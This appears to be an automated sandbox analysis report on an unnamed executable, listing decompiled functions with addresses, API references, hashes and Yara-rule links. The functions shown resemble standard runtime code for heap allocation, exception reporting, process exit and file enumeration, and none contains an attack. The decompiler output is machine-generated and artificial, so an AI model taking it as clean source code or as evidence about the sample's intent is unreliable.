Instruction ID: 78d63908047c3f24501b1a4ea29e74f0f9c2a09df36e1c5a4b76806daf35d19b
Opcode Fuzzy Hash: 15ac06341d1869c5be9bff9d4644510d53000bf7317bbfad6e4d18ac7378520f
Instruction Fuzzy Hash: 31F02B3310212866DF203A234C04A5B3759AB413A0B07C13BFC0AB62C0CA38DC3082E9

Uniqueness

Uniqueness Score: -1.00%

Function 004067AF, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067AF(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00407254(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4163f0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00406206();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E004093BC(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x004067b5
0x004067bb
0x004067ed
0x004067f2
0x004067f8
0x00000000
0x004067f8
0x004067bf
0x004067c1
0x004067c1
0x004067d8
0x004067e1
0x004067e9
0x00000000
0x00000000
0x004067c9
0x004067cb
0x00000000
0x00000000
0x004067d4
0x004067d6
0x00000000
0x00000000
0x004067d6
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,00407B24,00000220,0040AB94,00013385,?,?,?,?,00000000,00000000,?,0040AB94), ref: 004067E1

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 30fda3e37de4168e2b8e0ad8256daa5e76d800d04225ae53f2deb7e3a4c774a7
Instruction ID: 762a3af8c05f0e7ef54fdd193b519057992b4ac8f70cd6ff9e57b4ff61155e15
Opcode Fuzzy Hash: 30fda3e37de4168e2b8e0ad8256daa5e76d800d04225ae53f2deb7e3a4c774a7
Instruction Fuzzy Hash: 39E0392110022196EA312A6A9C00B5BB6989F457A8F17417BAC17B76D1DB39DC2582AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406EB1, Relevance: 4.6, APIs: 3, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406EB1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x4150a8; // 0x90cea005
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00403066(_t41);
					_pop(_t62);
				}
				E00404E20(_t67,  &_v804, 0, 0x50);
				E00404E20(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00403066(_t57);
				}
				return E004032D1(_v8 ^ _t70);
			}

0x00406eb1
0x00406eb1
0x00406eb1
0x00406eb1
0x00406ebc
0x00406ec1
0x00406ec3
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed5
0x00406ed5
0x00406ee1
0x00406ef4
0x00406f02
0x00406f08
0x00406f0e
0x00406f14
0x00406f1a
0x00406f20
0x00406f26
0x00406f2c
0x00406f32
0x00406f38
0x00406f3f
0x00406f46
0x00406f4d
0x00406f54
0x00406f5b
0x00406f62
0x00406f63
0x00406f6c
0x00406f72
0x00406f75
0x00406f7b
0x00406f88
0x00406f91
0x00406f9a
0x00406fa3
0x00406fb1
0x00406fb3
0x00406fc8
0x00406fd4
0x00406fd7
0x00406fdc
0x00406fe9

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00406FA9
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00406FB3
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00406FC0

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cfdfdaa980b2c8f8b4498b8ea93c8823796d26ade8959c49497f6c156e6eb6de
Instruction ID: 09632b23e9535b980bc8f7a85c71ec744b71ac0eb0a32a2fcbdda27ffbcea58f
Opcode Fuzzy Hash: cfdfdaa980b2c8f8b4498b8ea93c8823796d26ade8959c49497f6c156e6eb6de
Instruction Fuzzy Hash: DC31C47490122DABCB21DF69D98978DBBB8BF08310F5041EAE41CA7291E7749B858F48

Uniqueness

Uniqueness Score: -1.00%

Function 00405F4E, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F4E(int _a4) {
				void* _t14;

				if(E004081DD(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00405FD3(_t14, _a4);
				ExitProcess(_a4);
			}

0x00405f5b
0x00405f77
0x00405f77
0x00405f80
0x00405f89

APIs

GetCurrentProcess.KERNEL32(?,?,00405F4D,?,?,?,?,?,0040B43A), ref: 00405F70
TerminateProcess.KERNEL32(00000000,?,00405F4D,?,?,?,?,?,0040B43A), ref: 00405F77
ExitProcess.KERNEL32 ref: 00405F89

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 21e83ba028ebd328a0306f7a536238031a44e991cb9e96e2072dab9d8e7e9eb6
Instruction ID: 3ec9165c1a7b9fd2a44475ee1879d8c1c75524540a3bab13d7ffc46ad0439681
Opcode Fuzzy Hash: 21e83ba028ebd328a0306f7a536238031a44e991cb9e96e2072dab9d8e7e9eb6
Instruction Fuzzy Hash: 3AE0BF31004508ABCB216B65DE09E4A3B69EF40781B504435F909A6A72DB3DDD46DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3BD, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040D3BD(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E0040B7D4(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E0040B740(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x0040d3cb
0x0040d3d2
0x0040d3d7
0x0040d3dd
0x0040d3e0
0x0040d3e6
0x0040d3eb
0x0040d3f0
0x0040d3f0
0x0040d3f6
0x0040d3fb
0x0040d400
0x0040d400
0x0040d407
0x0040d40c
0x0040d411
0x0040d411
0x0040d418
0x0040d41d
0x0040d422
0x0040d422
0x0040d429
0x0040d42e
0x0040d433
0x0040d433
0x0040d43b
0x0040d44b
0x0040d45d
0x0040d46f
0x0040d482
0x0040d494
0x0040d49c
0x0040d4a1
0x0040d4a6
0x0040d4a6
0x0040d4ad
0x0040d4b2
0x0040d4b2
0x0040d4b9
0x0040d4be
0x0040d4be
0x0040d4c5
0x0040d4ca
0x0040d4ca
0x0040d4d1
0x0040d4d6
0x0040d4d6
0x0040d4e0
0x0040d4e2
0x0040d51c
0x0040d4e4
0x0040d4e9
0x0040d50d
0x0040d515
0x0040d509
0x0040d509
0x0040d51f
0x0040d526
0x0040d528
0x0040d54a
0x0040d552
0x0040d555
0x0040d555
0x0040d557
0x0040d557
0x0040d562
0x0040d568
0x0040d56d
0x0040d574
0x0040d5ae
0x0040d5b9
0x0040d5bf
0x0040d5c2
0x0040d5c5
0x0040d5d1
0x0040d5d9
0x0040d576
0x0040d579
0x0040d585
0x0040d58b
0x0040d591
0x0040d594
0x0040d59d
0x0040d59d
0x0040d5dc
0x0040d5ea
0x0040d5f0
0x0040d5f3
0x0040d5f8
0x0040d5fa
0x0040d5fd
0x0040d5fd
0x0040d602
0x0040d604
0x0040d607
0x0040d607
0x0040d60c
0x0040d60e
0x0040d611
0x0040d611
0x0040d616
0x0040d618
0x0040d61b
0x0040d61b
0x0040d620
0x0040d622
0x0040d622
0x0040d62f
0x0040d632
0x0040d669
0x0040d634
0x0040d634
0x0040d637
0x0040d662
0x0040d657
0x0040d657
0x0040d66b
0x0040d673
0x0040d676
0x0040d695
0x0040d69a
0x0040d69a
0x0040d69c
0x0040d6a1
0x0040d6ad
0x0040d6a3
0x0040d6a6
0x0040d6a6
0x0040d6b2
0x0040d6b2
0x0040d678
0x0040d67b
0x0040d68a
0x00000000
0x0040d68a
0x0040d67d
0x0040d680
0x0040d682
0x0040d682
0x00000000
0x0040d680
0x0040d639
0x0040d63c
0x0040d652
0x00000000
0x0040d652
0x0040d641
0x0040d643
0x0040d643
0x0040d641
0x00000000
0x0040d632
0x0040d52f
0x0040d53d
0x0040d545
0x00000000
0x0040d545
0x0040d533
0x0040d538
0x0040d538
0x00000000
0x0040d533
0x0040d4f0
0x0040d4fe
0x0040d506
0x00000000
0x0040d506
0x0040d4f4
0x0040d4f9
0x0040d4f9
0x0040d4f4

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0040D3B8,?,?,00000008,?,?,0040D050,00000000), ref: 0040D5EA

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e0f9336bebe1e3d867682b60c19978c96fb30653c259e267145ce86a714db47e
Instruction ID: c48f4946aa00f937ced3af1211726b86c54a52d5fb05354a7db4d568b0c1098d
Opcode Fuzzy Hash: e0f9336bebe1e3d867682b60c19978c96fb30653c259e267145ce86a714db47e
Instruction Fuzzy Hash: 9DB15D31610604DFD714CF68C48AB657BA0FF45364F258669E89ADF3E1C33AE986CB44

Uniqueness

Uniqueness Score: -1.00%

Function 004074A7, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004074A7(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v28;
				signed short* _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				signed int _v616;
				signed int _v620;
				intOrPtr _v648;
				intOrPtr _t42;
				void* _t47;
				signed int _t50;
				signed char _t52;
				intOrPtr* _t58;
				union _FINDEX_INFO_LEVELS _t60;
				int _t65;
				void* _t80;
				void* _t82;
				void* _t86;
				WCHAR* _t87;
				void* _t89;
				intOrPtr* _t92;
				intOrPtr _t95;
				intOrPtr* _t98;
				void* _t103;
				void* _t111;
				signed short* _t112;
				signed int _t118;
				intOrPtr _t122;
				void* _t125;
				void* _t127;
				void* _t132;
				signed int _t133;
				void* _t134;

				_push(__ecx);
				_t92 = _a4;
				_push(__ebx);
				_push(__edi);
				_t2 = _t92 + 2; // 0x2
				_t111 = _t2;
				do {
					_t42 =  *_t92;
					_t92 = _t92 + 2;
				} while (_t42 != 0);
				_t118 = _a12;
				_t95 = (_t92 - _t111 >> 1) + 1;
				_v8 = _t95;
				if(_t95 <=  !_t118) {
					_push(__esi);
					_t5 = _t118 + 1; // 0x1
					_t86 = _t5 + _t95;
					_t125 = E00406841(_t86, 2);
					if(_t118 == 0) {
						L7:
						_push(_v8);
						_t86 = _t86 - _t118;
						_t47 = E004071D0(_t125 + _t118 * 2, _t86, _a4);
						_t133 = _t132 + 0x10;
						if(_t47 != 0) {
							goto L12;
						} else {
							_t122 = _a16;
							_t89 = E004076F1(_t122);
							if(_t89 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_t122 + 4)))) = _t125;
								 *((intOrPtr*)(_t122 + 4)) =  *((intOrPtr*)(_t122 + 4)) + 4;
								_t89 = 0;
							} else {
								E00406775(_t125);
							}
							E00406775(0);
							_t80 = _t89;
							goto L4;
						}
					} else {
						_push(_t118);
						_t82 = E004071D0(_t125, _t86, _a8);
						_t133 = _t132 + 0x10;
						if(_t82 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0040706D();
							asm("int3");
							_t131 = _t133;
							_t134 = _t133 - 0x264;
							_t50 =  *0x4150a8; // 0x90cea005
							_v48 = _t50 ^ _t133;
							_t112 = _v32;
							_t98 = _v28;
							_push(_t86);
							_t87 = _v36;
							_v648 = _t98;
							_push(_t125);
							_push(_t118);
							if(_t112 != _t87) {
								while(E004076CD( *_t112 & 0x0000ffff) == 0) {
									_t112 = _t112 - 2;
									if(_t112 != _t87) {
										continue;
									}
									break;
								}
								_t98 = _v612;
							}
							_t126 =  *_t112 & 0x0000ffff;
							if(( *_t112 & 0x0000ffff) != 0x3a || _t112 ==  &(_t87[1])) {
								_t52 = E004076CD(_t126);
								asm("sbb eax, eax");
								_t119 = 0;
								_v616 =  ~(_t52 & 0x000000ff) & (_t112 - _t87 >> 0x00000001) + 0x00000001;
								_t127 = FindFirstFileExW(_t87, 0,  &_v604, 0, 0, 0);
								_t58 = _v612;
								if(_t127 != 0xffffffff) {
									_v620 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
									_t103 = 0x2e;
									do {
										if(_v604.cFileName != _t103 || _v558 != _t119 && (_v558 != _t103 || _v556 != _t119)) {
											_push(_t58);
											_t60 = E004074A7(_t87, _t103, _t119, _t127,  &(_v604.cFileName), _t87, _v616);
											_t134 = _t134 + 0x10;
											if(_t60 != 0) {
												_t119 = _t60;
											} else {
												goto L28;
											}
										} else {
											goto L28;
										}
										L32:
										FindClose(_t127);
										goto L33;
										L28:
										_t65 = FindNextFileW(_t127,  &_v604);
										_t58 = _v612;
										_t103 = 0x2e;
									} while (_t65 != 0);
									_t116 =  *_t58;
									_t106 = _v620;
									_t68 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
									if(_v620 !=  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2) {
										E0040A140(_t87, _t119, _t127, _t116 + _t106 * 4, _t68 - _t106, 4, E00407267);
									}
									goto L32;
								} else {
									_push(_t58);
									_t119 = E004074A7(_t87,  &_v605, 0, _t127, _t87, 0, 0);
								}
								L33:
							} else {
								_push(_t98);
								E004074A7(_t87, _t98, 0, _t126, _t87, 0, 0);
							}
							return E004032D1(_v12 ^ _t131);
						} else {
							goto L7;
						}
					}
				} else {
					_t80 = 0xc;
					L4:
					return _t80;
				}
			}

0x004074ac
0x004074ad
0x004074b0
0x004074b1
0x004074b4
0x004074b4
0x004074b7
0x004074b7
0x004074ba
0x004074bd
0x004074c2
0x004074cb
0x004074ce
0x004074d3
0x004074dc
0x004074dd
0x004074e0
0x004074ea
0x004074f0
0x00407504
0x00407504
0x00407507
0x00407511
0x00407516
0x0040751b
0x00000000
0x0040751d
0x0040751d
0x00407527
0x0040752b
0x00407539
0x0040753b
0x0040753f
0x0040752d
0x0040752e
0x00407533
0x00407543
0x00407549
0x00000000
0x0040754b
0x004074f2
0x004074f2
0x004074f8
0x004074fd
0x00407502
0x0040754e
0x00407550
0x00407551
0x00407552
0x00407553
0x00407554
0x00407555
0x0040755a
0x0040755e
0x00407560
0x00407566
0x0040756d
0x00407570
0x00407573
0x00407576
0x00407577
0x0040757a
0x00407580
0x00407581
0x00407584
0x00407586
0x00407599
0x0040759e
0x00000000
0x00000000
0x00000000
0x0040759e
0x004075a0
0x004075a0
0x004075a6
0x004075ac
0x004075cf
0x004075de
0x004075e0
0x004075e7
0x004075fc
0x004075fe
0x00407607
0x00407626
0x0040762c
0x0040762d
0x00407634
0x00407651
0x00407660
0x00407665
0x0040766a
0x004076b3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004076b5
0x004076b6
0x00000000
0x0040766c
0x00407674
0x0040767e
0x00407684
0x00407684
0x00407687
0x0040768c
0x00407694
0x00407699
0x004076a9
0x004076ae
0x00000000
0x00407609
0x00407609
0x00407615
0x00407615
0x004076bc
0x004075b5
0x004075b5
0x004075bb
0x004075c0
0x004076cc
0x00000000
0x00000000
0x00000000
0x00407502
0x004074d5
0x004074d7
0x004074d8
0x004074db
0x004074db

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fa5c3f62130d5cd155efdfba912a8a7f39a8059f1021e224edf0135f45a518
Instruction ID: dab23b6b6fe37a02db016751518925c348f61891514e70184756b485444f3db0
Opcode Fuzzy Hash: 41fa5c3f62130d5cd155efdfba912a8a7f39a8059f1021e224edf0135f45a518
Instruction Fuzzy Hash: A031C872D042197FCB24DF69CC89DBB7BB9EB84314F14457DF905A7281EA34AE40CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00401120, Relevance: 1.6, APIs: 1, Instructions: 63
comCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00401120(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				char* _t23;

				_t23 =  &_v16;
				__imp__CoCreateInstance(_a4, 0, 3, 0x40f1d4, _t23);
				_v8 = _t23;
				if(_v8 >= 0) {
					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v16))))(_v16, 0x40f204,  &_v12);
					 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
					if(_v8 >= 0) {
						_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x40f214, _a12);
						if(_v8 >= 0) {
							 *_a8 = _v12;
							return 1;
						}
						 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x00401126
0x00401137
0x0040113d
0x00401144
0x00401160
0x0040116f
0x00401175
0x00401191
0x00401198
0x004011b2
0x00000000
0x004011b4
0x004011a6
0x00000000
0x004011a8
0x00000000
0x00401177
0x00000000

APIs

CoCreateInstance.OLE32(?,00000000,00000003,0040F1D4,?), ref: 00401137

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: df32a7c287695565c42c768e4ba6686de5cbcf5f28644733c0cd95780d0f4fa0
Instruction ID: 13465c9f114bc17d937046b70a693987da5458754414a056d7e360e26772ba97
Opcode Fuzzy Hash: df32a7c287695565c42c768e4ba6686de5cbcf5f28644733c0cd95780d0f4fa0
Instruction Fuzzy Hash: F821ED79A00108EFCB04DFA4D884F9DB7B5EB8C704F1081A9EA15AB390D774AE45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004092F9, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004092F9() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4163f0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x004092f9
0x00409301
0x00409309

APIs

GetProcessHeap.KERNEL32 ref: 004092F9

Memory Dump Source

Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b0e339a411bed3eeb4b1ebc583c3354927c8f25eee9689a5a94ddc396066fb49
